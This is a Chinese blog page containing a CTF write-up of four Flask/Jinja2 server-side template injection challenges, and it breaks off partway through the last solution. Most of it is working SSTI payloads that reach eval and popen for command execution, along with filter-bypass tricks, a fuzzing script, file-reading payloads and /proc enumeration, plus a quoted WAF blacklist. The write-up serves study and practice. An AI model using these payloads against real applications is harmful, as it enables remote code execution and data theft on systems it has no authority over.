<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="web-ssti-flask[CSCCTF 2019 Qual]FlaskLight一道初级的ssti题目，打开靶机，页面提示使用search注入尝试使用&amp;#123;&amp;#123;9*9&amp;#125;&amp;#125;回显81，证明存在ssti漏洞，尝试利用漏洞。尝试查询类 1http:&#x2F;&#x2F;f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81&#x2F;?sea">
<meta property="og:type" content="article">
<meta property="og:title" content="2022.3.3">
<meta property="og:url" content="http://example.com/2022/03/03/2022-3-3/index.html">
<meta property="og:site_name" content="灵能对抗实验室">
<meta property="og:description" content="web-ssti-flask[CSCCTF 2019 Qual]FlaskLight一道初级的ssti题目，打开靶机，页面提示使用search注入尝试使用&amp;#123;&amp;#123;9*9&amp;#125;&amp;#125;回显81，证明存在ssti漏洞，尝试利用漏洞。尝试查询类 1http:&#x2F;&#x2F;f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81&#x2F;?sea">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-03-03T10:34:29.000Z">
<meta property="article:modified_time" content="2022-03-09T11:08:30.680Z">
<meta property="article:author" content="hanbaiGG">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/03/03/2022-3-3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>2022.3.3 | 灵能对抗实验室</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">灵能对抗实验室</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-resources">

    <a href="/resources/" rel="section"><i class="fa fa-download fa-fw"></i>资源</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/03/2022-3-3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="hanbaiGG">
      <meta itemprop="description" content="为什么不拉弟弟一把呢">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="灵能对抗实验室">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2022.3.3
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-03-03 18:34:29" itemprop="dateCreated datePublished" datetime="2022-03-03T18:34:29+08:00">2022-03-03</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-03-09 19:08:30" itemprop="dateModified" datetime="2022-03-09T19:08:30+08:00">2022-03-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="web-ssti-flask"><a href="#web-ssti-flask" class="headerlink" title="web-ssti-flask"></a>web-ssti-flask</h1><h2 id="CSCCTF-2019-Qual-FlaskLight"><a href="#CSCCTF-2019-Qual-FlaskLight" class="headerlink" title="[CSCCTF 2019 Qual]FlaskLight"></a>[CSCCTF 2019 Qual]FlaskLight</h2><p>一道初级的ssti题目，<br>打开靶机，页面提示使用<code>search</code>注入<br>尝试使用<code>&#123;&#123;9*9&#125;&#125;</code>回显81，证明存在ssti漏洞，尝试利用漏洞。<br>尝试查询类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81/?search=&#123;&#123;&#x27;&#x27;.__class__.&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>查询父类，不是<code>object</code>，再次向上查询</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81/?search=&#123;&#123;&#x27;&#x27;.__class__.__base__.__base__&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>使用脚本寻找可用类，脚本多次寻找失败，考虑输入过滤或禁用。<br>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests <span class="keyword">as</span> res</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">60</span>,<span class="number">400</span>):</span><br><span class="line">    sleep(<span class="number">0.1</span>)</span><br><span class="line">    url=<span class="string">&quot;http://f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81/?search=&#123;&#123;&#x27;&#x27;.__class__.__base__.__base__.__subclasses__()[%d].__init__[&#x27;__glob&#x27;+&#x27;als__&#x27;]&#125;&#125;&quot;</span></span><br><span class="line">    response=res.get(url%i)</span><br><span class="line">	<span class="built_in">print</span>(<span class="built_in">len</span>(response.text),i,response.status_code)</span><br></pre></td></tr></table></figure>
<p>直接输入文本形式，发现拒绝访问<br>对<code>globals</code>进行了过滤<br>使用python的字符串拼接功能，成功绕过。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://f8aa304e-ac57-4d8a-8594-1bbcb64c2bb8.node4.buuoj.cn:81/?search=&#123;&#123;&#x27;&#x27;.__class__.__base__.__base__.__subclasses__()[71].__init__.__globals__&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>查询<code>os</code>功能，如果存在<code>&#39;os&#39;: &lt;module &#39;os&#39; from &#39;/usr/lib/python2.7/os.pyc&#39;&gt;</code>，无需引入os功能<br>使用popen功能实现任意命令执行。<br>如果显示<code>OSERRO</code>，可利用<code>__builtins__</code>类实现任意命令执行。<br>需要自行加入os</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;.__class__.__base__.__base__.__subclasses__()[59].__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;][&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;**find / -name *flag***&#x27;).read()&quot;)&#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>进入flasklight目录，发现flag文件，打开后获得flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://bbe55e8c-86ed-4a05-b431-dfbb9c9a8939.node4.buuoj.cn:81/?search=&#123;&#123;&#x27;&#x27;.__class__.__base__.__base__.__subclasses__()[60].__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;][&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat flasklight/coomme_geeeett_youur_flek &#x27;).read()&quot;)&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>一步到位注入程序</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">	&#123;% if c.__name__ == &#x27;catch_warnings&#x27; %&#125; </span><br><span class="line">		&#123;% for b in c.__init__[&#x27;__glo&#x27;+&#x27;bals__&#x27;].values() %&#125; </span><br><span class="line">        	&#123;% if b.__class__ == &#123;&#125;.__class__ %&#125; </span><br><span class="line">            	&#123;% if &#x27;eval&#x27; in b.keys() %&#125; </span><br><span class="line">                	&#123;&#123; b[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;cat /flasklight/coomme_geeeett_youur_flek&quot;).read()&#x27;) &#125;&#125; </span><br><span class="line">                &#123;% endif %&#125; </span><br><span class="line">            &#123;% endif %&#125; </span><br><span class="line">        &#123;% endfor %&#125;</span><br><span class="line">    &#123;% endif %&#125; </span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<h2 id="GYCTF2020-FlaskApp"><a href="#GYCTF2020-FlaskApp" class="headerlink" title="[GYCTF2020]FlaskApp"></a>[GYCTF2020]FlaskApp</h2><p>一个进行base64加密的flask小程序，存在输入的地方就可能存在注入点。<br>加密页面没有注入问题，但在解密界面尝试<code>&#123;&#123;9*9&#125;&#125;</code>后报错，发现该程序启用了debug模式，可以看到出错处的程序。<br>泄露源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/decode&#x27;,methods=[&#x27;POST&#x27;,&#x27;GET&#x27;])</span><br><span class="line"></span><br><span class="line">def decode():</span><br><span class="line"></span><br><span class="line">    if request.values.get(&#x27;text&#x27;) :</span><br><span class="line"></span><br><span class="line">        text = request.values.get(&quot;text&quot;)</span><br><span class="line"></span><br><span class="line">        text_decode = base64.b64decode(text.encode())</span><br><span class="line"></span><br><span class="line">        tmp = &quot;结果 ： &#123;0&#125;&quot;.format(text_decode.decode())</span><br><span class="line"></span><br><span class="line">        if waf(tmp) :</span><br><span class="line"></span><br><span class="line">            flash(&quot;no no no !!&quot;)</span><br><span class="line"></span><br><span class="line">            return redirect(url_for(&#x27;decode&#x27;))</span><br><span class="line"></span><br><span class="line">        res =  render_template_string(tmp)</span><br></pre></td></tr></table></figure>
<p>审计代码，输入一个base64字符串，解码后经过waf的过滤后进入res函数。<br>制作一个fuzz脚本检测waf函数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">import binascii</span><br><span class="line">from time import sleep</span><br><span class="line">import base64 as b64</span><br><span class="line">import requests as res</span><br><span class="line">for i in range(33,125):</span><br><span class="line">    sleep(0.3)</span><br><span class="line">    url=&quot;http://99d49261-2fc3-49c1-8aee-6e883e57409b.node4.buuoj.cn:81/decode?text=%s&quot;</span><br><span class="line">    eurl=str(b64.b64encode((bytes([i]))))</span><br><span class="line">    response=res.get(url%eurl)</span><br><span class="line">    if(&quot;no no no !!&quot; in response.text):</span><br><span class="line">        print(i)</span><br><span class="line">    print(response.url)</span><br><span class="line">    print(len(response.text),i,response.status_code,eurl,chr(i))</span><br><span class="line">    </span><br></pre></td></tr></table></figure>
<p>使用<code>config</code>类最简单的payload尝试获取源码<br>得到waf的黑名单</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">black_list = [&amp;#34;flag&amp;#34;,&amp;#34;os&amp;#34;,&amp;#34;system&amp;#34;,&amp;#34;popen&amp;#34;,&amp;#34;import&amp;#34;,&amp;#34;eval&amp;#34;,&amp;#34;chr&amp;#34;,&amp;#34;request&amp;#34;, &amp;#34;subprocess&amp;#34;,&amp;#34;commands&amp;#34;,&amp;#34;socket&amp;#34;,&amp;#34;hex&amp;#34;,&amp;#34;base64&amp;#34;,&amp;#34;*&amp;#34;,&amp;#34;?&amp;#34;] </span><br></pre></td></tr></table></figure>
<p>使用<code>os</code>的内置函数列目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.__class__.__init__.__globals__[&#x27;o&#x27;+&#x27;s&#x27;].listdir(&#x27;/&#x27;)&#125;&#125;</span><br><span class="line">e3tjb25maWcuX19jbGFzc19fLl9faW5pdF9fLl9fZ2xvYmFsc19fWydvJysncyddLmxpc3RkaXIoJy8nKX19</span><br></pre></td></tr></table></figure>
<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[&amp;#39;bin&amp;#39;, &amp;#39;boot&amp;#39;, &amp;#39;dev&amp;#39;, &amp;#39;etc&amp;#39;, &amp;#39;home&amp;#39;, &amp;#39;lib&amp;#39;, &amp;#39;lib64&amp;#39;, &amp;#39;media&amp;#39;, &amp;#39;mnt&amp;#39;, &amp;#39;opt&amp;#39;, &amp;#39;proc&amp;#39;, &amp;#39;root&amp;#39;, &amp;#39;run&amp;#39;, &amp;#39;sbin&amp;#39;, &amp;#39;srv&amp;#39;, &amp;#39;sys&amp;#39;, &amp;#39;tmp&amp;#39;, &amp;#39;usr&amp;#39;, &amp;#39;var&amp;#39;, &amp;#39;this_is_the_flag.txt&amp;#39;, &amp;#39;.dockerenv&amp;#39;, &amp;#39;app&amp;#39;] </span><br></pre></td></tr></table></figure>
<p>利用<code>open</code>函数获取flag，使用拼接绕过<code>os</code>和<code>flag</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.__class__.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/this_is_the_fl&#x27;+&#x27;ag.txt&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">e3tjb25maWcuX19jbGFzc19fLl9faW5pdF9fLl9fZ2xvYmFsc19fWydfX2J1aWx0aW5zX18nXS5vcGVuKCcvdGhpc19pc190aGVfZmwnKydhZy50eHQnKS5yZWFkKCl9fQ==</span><br></pre></td></tr></table></figure>
<p>直接获得flag</p>
<h2 id="RootersCTF2019-I-lt-3-Flask"><a href="#RootersCTF2019-I-lt-3-Flask" class="headerlink" title="[RootersCTF2019]I_&lt;3_Flask"></a>[RootersCTF2019]I_&lt;3_Flask</h2><p>没有什么参数提示<br>使用工具进行爆破<br>参数爆破工具arjun：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 arjun -u http://270ecd40-84d3-4667-bee9-04c7c2aeb5c2.node3.buuoj.cn/ -c 100 -d 5</span><br></pre></td></tr></table></figure>
<p>存在ssti漏洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&#x27;&#x27;.__base__.__class__&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>得到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">I ♥ Flask &amp; &lt;class &#x27;jinja2.runtime.Undefined&#x27;&gt; </span><br></pre></td></tr></table></figure>
<p>确认是jinja2的模板<br>没有进行关键的过滤，所以直接使用最简的啊payload<br>查询目录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].listdir()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>发现flag.txt文件<br>直接open文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=&#123;&#123;config.__class__.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;flag.txt&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h2 id="pasecactf-2019-flask-ssti-1"><a href="#pasecactf-2019-flask-ssti-1" class="headerlink" title="[pasecactf_2019]flask_ssti 1"></a>[pasecactf_2019]flask_ssti 1</h2><p>buuj的题目出现了点问题，只有直接post才能发送请求<br>尝试ssti</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nickname=&#123;&#123;9*9&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>成功，但存在过滤<br>寻找过滤符号<br>过滤了<code>&#123;&#123;''&#125;&#125; &#123;&#123;_&#125;&#125; &#123;&#123;.&#125;&#125;</code><br>分别使用<code>&#123;&#123;""&#125;&#125; &#123;&#123;\x5f&#125;&#125; &#123;&#123;[]&#125;&#125;</code>绕过<br>查看当前文件夹下的文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&quot;os&quot;][&quot;popen&quot;](&quot;ls&quot;)[&quot;read&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>没有找到flag的可疑文件，查看源码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：&#123;&#123;config[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&quot;os&quot;][&quot;popen&quot;](&quot;cat app\x2epy&quot;)[&quot;read&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[♥♥♥payload：import random from flask import Flask, render_template_string, render_template, request import os app = Flask(__name__) app.config[&#x27;SECRET_KEY&#x27;] = &#x27;folow @osminogka.ann on instagram =)&#x27; #Tiaonmmn don&#x27;t remember to remove this part on deploy so nobody will solve that hehe &#x27;&#x27;&#x27; def encode(line, key, key2): return &#x27;&#x27;.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line))) app.config[&#x27;flag&#x27;] = encode(&#x27;&#x27;, &#x27;GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3&#x27;, &#x27;xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT&#x27;) &#x27;&#x27;&#x27; def encode(line, key, key2): return &#x27;&#x27;.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line))) file = open(&quot;/app/flag&quot;, &quot;r&quot;) flag = file.read() flag = flag[:42] app.config[&#x27;flag&#x27;] = encode(flag, &#x27;GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3&#x27;, &#x27;xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT&#x27;) flag = &quot;&quot; os.remove(&quot;/app/flag&quot;) nicknames = [&#x27;˜”*°★☆★_%s_★☆★°°*&#x27;, &#x27;%s ~♡ⓛⓞⓥⓔ♡~&#x27;, &#x27;%s Вêчңø в øĤлâйĤé&#x27;, &#x27;♪ ♪ ♪ %s ♪ ♪ ♪ &#x27;, &#x27;[♥♥♥%s♥♥♥]&#x27;, &#x27;%s, kOтO®Aя )(оТеЛ@ ©4@$tьЯ&#x27;, &#x27;♔%s♔&#x27;, &#x27;[♂+♂=♥]%s[♂+♂=♥]&#x27;] @app.route(&#x27;/&#x27;, methods=[&#x27;GET&#x27;, &#x27;POST&#x27;]) def index(): if request.method == &#x27;POST&#x27;: try: p = request.values.get(&#x27;nickname&#x27;) id = random.randint(0, len(nicknames) - 1) if p != None: if &#x27;.&#x27; in p or &#x27;_&#x27; in p or &#x27;\&#x27;&#x27; in p: return &#x27;Your nickname contains restricted characters!&#x27; return render_template_string(nicknames[id] % p) except Exception as e: print(e) return &#x27;Exception&#x27; return render_template(&#x27;index.html&#x27;) if __name__ == &#x27;__main__&#x27;: app.run(host=&#x27;0.0.0.0&#x27;, port=1337) ♥♥♥]</span><br></pre></td></tr></table></figure>
<p>这个源码太抽象了<br>大概功能就是将flag文件读取进来后进行加密异或运算，在将密文存储在config中，最后把flag.txt删掉了</p>
<h3 id="解法1"><a href="#解法1" class="headerlink" title="解法1"></a>解法1</h3><p>由于是通过异或求得的，通过相同的步骤可以直接复原<br>获得密文</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config&#125;&#125;</span><br><span class="line">&#x27;flag&#x27;: &#x27;-M7\x10wG0&gt;3\x07%a~\x0e\x1c\x0bn\x07(D\x10\x1a\\\x17!j\x051\x02\r\x12Y&quot;\x03#|@;\x10\t\x1fG&#x27;&#125;</span><br></pre></td></tr></table></figure>
<p>再次运行脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">def encode(line, key, key2):</span><br><span class="line">    return &#x27;&#x27;.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))</span><br><span class="line">flag=&#x27;-M7\x10wG0&gt;3\x07%a~\x0e\x1c\x0bn\x07(D\x10\x1a\\\x17!j\x051\x02\r\x12Y&quot;\x03#|@;\x10\t\x1fG&#x27;</span><br><span class="line">flag = encode(flag, &#x27;GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3&#x27;, &#x27;xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT&#x27;)</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>
<p>得到flag</p>
<h3 id="解法2"><a href="#解法2" class="headerlink" title="解法2"></a>解法2</h3><p>因为靶机在linux下运行，而flaskapp没有关闭，因此可以通过进程中的指令复原被删除的文件操作。</p>
<h4 id="proc目录"><a href="#proc目录" class="headerlink" title="/proc目录"></a>/proc目录</h4><p>*Linux 内核提供了一种通过 /proc 文件系统，在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统，它只存在内存当中，而不占用外存空间。它以文件系统的方式为访问系统内核数据的操作提供接口。<br>还有的是一些以数字命名的目录，他们是进程目录。系统中当前运行的每一个进程都有对应的一个目录在/proc下，以进程的PID号为目录名，他们是读取进程信息的接口。而self目录则是读取进程本身的信息接口，是一个link<br>*</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls -al /proc</span><br></pre></td></tr></table></figure>
<h4 id="cmdline"><a href="#cmdline" class="headerlink" title="cmdline"></a>cmdline</h4><p><em>cmdline 文件存储着启动当前进程的完整命令，但僵尸进程目录中的此文件不包含任何信息。可以通过查看cmdline目录获取启动指定进程的完整命令：</em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取cat进程的启动命令</span><br><span class="line">cat /proc/#pid#/cmdline</span><br></pre></td></tr></table></figure>
<h4 id="cwd"><a href="#cwd" class="headerlink" title="cwd"></a>cwd</h4><p><em>cwd 文件是一个指向当前进程运行目录的符号链接。可以通过查看cwd文件获取目标指定进程环境的运行目录</em></p>
<h4 id="exe"><a href="#exe" class="headerlink" title="exe"></a>exe</h4><p><em>exe 是一个指向启动当前进程的可执行文件（完整路径）的符号链接。通过exe文件我们可以获得指定进程的可执行文件的完整路径</em></p>
<h4 id="enciron"><a href="#enciron" class="headerlink" title="enciron"></a>enciron</h4><p><em>environ文件存储着当前进程的环境变量列表，彼此间用空字符（NULL）隔开，变量用大写字母表示，其值用小写字母表示。可以通过查看environ目录来获取指定进程的环境变量信息：</em></p>
<h4 id="fd"><a href="#fd" class="headerlink" title="fd"></a>fd</h4><p><em>fd是一个目录，里面包含着当前进程打开的每一个文件的描述符（file descriptor）差不多就是路径啦，这些文件描述符是指向实际文件的一个符号连接，即每个通过这个进程打开的文件都会显示在这里。所以我们可以通过fd目录的文件获取进程，从而打开每个文件的路径以及文件内容</em><br>特别指出，当linux使用<code>open</code>打开一个文件时，只要没有关闭，即使被删除仍然保留在fd中，可以被复原。</p>
<h4 id="self"><a href="#self" class="headerlink" title="self"></a>self</h4><p>特殊访问当前使用的进程信息<br>通过题目所在程序的进程才能进入题目程序的self文件夹</p>
<h4 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h4><p>首先试图获取该进程的pid</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nickname=&#123;&#123;()[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5fbases\x5f\x5f&quot;][0][&quot;\x5f\x5fsubclasses\x5f\x5f&quot;]()[127][&quot;\x5f\x5finit\x5f\x5f&quot;][&quot;\x5f\x5fglobals\x5f\x5f&quot;][&quot;popen&quot;](&quot;ps&quot;)[&quot;read&quot;]()&#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>得到<code>PID USER TIME COMMAND 1 root 0:04 python app.py 34 root 0:00 ps</code><br>获得文件序号</p>
